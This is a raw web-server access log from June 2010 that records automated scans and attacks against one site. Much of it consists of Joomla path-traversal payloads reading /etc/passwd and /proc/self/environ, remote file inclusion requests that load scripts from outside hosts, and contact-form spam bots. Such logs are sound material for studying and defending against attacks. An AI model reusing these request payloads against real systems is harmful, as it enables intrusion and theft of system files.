64.34.165.224 - - [29/Jun/2010:05:27:59 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:27:59 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:07 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:36 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:36 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:36 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:53 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:53 -0500] "GET /logs/access_log.1277164800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:54 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:54 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:28:54 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:29:06 -0500] "GET /logs/access_log.1274572800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:29:07 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:29:07 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.834"
204.51.97.113 - - [29/Jun/2010:05:29:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
64.34.165.224 - - [29/Jun/2010:05:30:02 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:30:21 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
194.126.234.29 - - [29/Jun/2010:05:30:25 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:30:25 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:30:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:30:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:30:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:30:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:30:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:30:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
64.34.165.224 - - [29/Jun/2010:05:30:34 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:31:10 -0500] "GET /logs/access_log.1277164800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:31:10 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:31:10 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:31:10 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:31:11 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:31:11 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:31:19 -0500] "GET /logs/access_log.1276819200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
194.126.234.29 - - [29/Jun/2010:05:31:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:31:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:31:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
194.126.234.29 - - [29/Jun/2010:05:31:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
219.240.36.36 - - [29/Jun/2010:05:31:42 -0500] "GET /logs/access_log.1275696000///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
219.240.36.36 - - [29/Jun/2010:05:31:42 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
219.240.36.36 - - [29/Jun/2010:05:31:44 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
87.250.252.241 - - [29/Jun/2010:05:31:57 -0500] "GET /logs/access_log.1262390400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
64.34.165.224 - - [29/Jun/2010:05:31:59 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:32:02 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:32:19 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:32:19 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:32:19 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:32:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:32:20 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:32:20 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:32:58 -0500] "GET /logs/access_log.1275868800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:00 -0500] "GET /logs/access_log.1275868800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:00 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:00 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:09 -0500] "GET /logs/access_log.1276214400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:10 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:12 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:22 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:22 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:22 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:34 -0500] "GET /logs/access_log.1277164800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:58 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:59 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:33:59 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.834"
204.51.97.113 - - [29/Jun/2010:05:34:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
64.34.165.224 - - [29/Jun/2010:05:34:18 -0500] "GET /logs/access_log.1274572800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:34:54 -0500] "GET /logs/access_log.1275868800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:34:55 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:34:55 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:34:55 -0500] "GET /logs/access_log.1274572800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
64.34.165.224 - - [29/Jun/2010:05:35:07 -0500] "GET /logs/access_log.1276214400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.30.129.57 - - [29/Jun/2010:05:35:29 -0500] "GET /logs/access_log.1274572800%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:05:35:29 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:05:35:29 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:05:35:54 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:05:35:54 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.30.129.57 - - [29/Jun/2010:05:35:54 -0500] "GET /logs/access_log.1274572800%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
80.13.96.200 - - [29/Jun/2010:05:44:41 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
80.13.96.200 - - [29/Jun/2010:05:44:42 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
80.13.96.200 - - [29/Jun/2010:05:44:42 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
80.13.96.200 - - [29/Jun/2010:05:45:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.97.113 - - [29/Jun/2010:05:46:12 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.97.113 - - [29/Jun/2010:05:46:12 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
204.51.97.113 - - [29/Jun/2010:05:46:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
67.195.112.180 - - [29/Jun/2010:05:50:19 -0500] "GET /logs/access_log.1155859200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [29/Jun/2010:05:50:25 -0500] "GET /logs/access_log.1182902400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.240.36.36 - - [29/Jun/2010:05:51:08 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
59.108.94.32 - - [29/Jun/2010:05:52:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
80.13.96.200 - - [29/Jun/2010:05:56:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
208.80.193.121 - - [29/Jun/2010:05:58:55 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
95.154.248.22 - - [29/Jun/2010:06:15:26 -0500] "GET //Gallery/displayCategory.php?basepath=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:15:26 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:15:26 -0500] "GET /logs/access_log.1274572800//Gallery/displayCategory.php?basepath=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:15:26 -0500] "GET /logs/access_log.1277164800//Gallery/displayCategory.php?basepath=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:15:26 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:15:26 -0500] "GET /logs/access_log.1277164800//Gallery/displayCategory.php?basepath=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:15:26 -0500] "GET //Gallery/displayCategory.php?basepath=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:15:27 -0500] "GET /logs/access_log.1274572800//Gallery/displayCategory.php?basepath=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:19:48 -0500] "GET /logs//index.inc.php?PATH_Includes=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:19:48 -0500] "GET //index.inc.php?PATH_Includes=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:19:49 -0500] "GET /logs/access_log.1277164800//index.inc.php?PATH_Includes=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:19:49 -0500] "GET /logs//index.inc.php?PATH_Includes=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:19:49 -0500] "GET //index.inc.php?PATH_Includes=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
95.154.248.22 - - [29/Jun/2010:06:19:50 -0500] "GET /logs/access_log.1277164800//index.inc.php?PATH_Includes=http://www.yangsheng.ru/board/fx29id2.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.199.182 - - [29/Jun/2010:06:21:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.192.222.68 - - [29/Jun/2010:06:22:50 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.195.112.180 - - [29/Jun/2010:06:26:03 -0500] "GET /logs/access_log.1178064000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.13.96.200 - - [29/Jun/2010:06:26:54 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
80.13.96.200 - - [29/Jun/2010:06:26:55 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
80.13.96.200 - - [29/Jun/2010:06:26:55 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
62.44.73.150 - - [29/Jun/2010:06:31:12 -0500] "GET /logs/access_log.1277164800/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
62.44.73.150 - - [29/Jun/2010:06:31:12 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
62.44.73.150 - - [29/Jun/2010:06:31:13 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
121.78.118.123 - - [29/Jun/2010:06:31:14 -0500] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.44.73.150 - - [29/Jun/2010:06:31:22 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
62.44.73.150 - - [29/Jun/2010:06:32:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
173.192.222.68 - - [29/Jun/2010:06:34:32 -0500] "GET /logs/access_log.1276473600/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
